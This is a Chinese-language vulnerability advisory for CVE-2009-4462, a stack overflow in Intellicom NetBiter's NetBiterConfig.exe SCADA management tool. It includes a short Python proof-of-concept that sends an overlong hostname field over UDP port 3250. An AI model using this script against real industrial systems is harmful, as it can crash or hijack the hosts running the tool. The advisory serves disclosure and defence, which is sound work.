发布日期：2009-12-15
更新日期：2009-12-15

受影响系统：

Intellicom NetBiter

描述：

---

BUGTRAQ  ID: 37325
CVE(CAN) ID: CVE-2009-4462

Intellicom NetBiter是一种WebSCADA协议实现管理的硬件。

Intellicom NetBiter的管理程序NetBiterConfig.exe的实现上存在栈缓冲区溢出漏洞，远程攻击者可能利用此漏洞攻击运行了管理程序的主机系统，导致完全控制系统。

管理程序NetBiterConfig.exe监听了UDP/3250端口来处理与设备设备的通信，在处理HMS HICP协议数据中包含的超长的主机名信息时存在栈溢出漏洞，恶意请求会导致缓冲区溢出进而控制程序执行流程。

<*来源：Ruben Santamarta （ruben@reversemode.com）
  
  链接：http://reversemode.com/index.php?option=com_content&task=view&id=65&Itemid=1
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/python

# Intellicom NetBiterConfig.exe 1.3.0 Remote Buffer Overflow.
# Ruben Santamarta - www.reversemode.com
# For research purposes ONLY.

import sys
import socket

s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("10.10.10.10",3250))
s.send("protocol version = 1.10; "
+"fb type = EVIL-DEVICE; "
+"module version = 0.66.6; "
+"mac = 00-30-11-00-BA-CA; "
+"ip = 192.168.1.52; "
+"sn = 255.255.255.0; "
+"gw = 192.168.1.1; "
+"dhcp = off; "
+"pswd = off; "
+"hn = "+"A"*0×60+"; "
+"dns1 = 192.168.1.33;")

建议：

---

厂商补丁：

Intellicom
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.intellicom.se/

浏览次数：2701
严重程度：0（网友投票）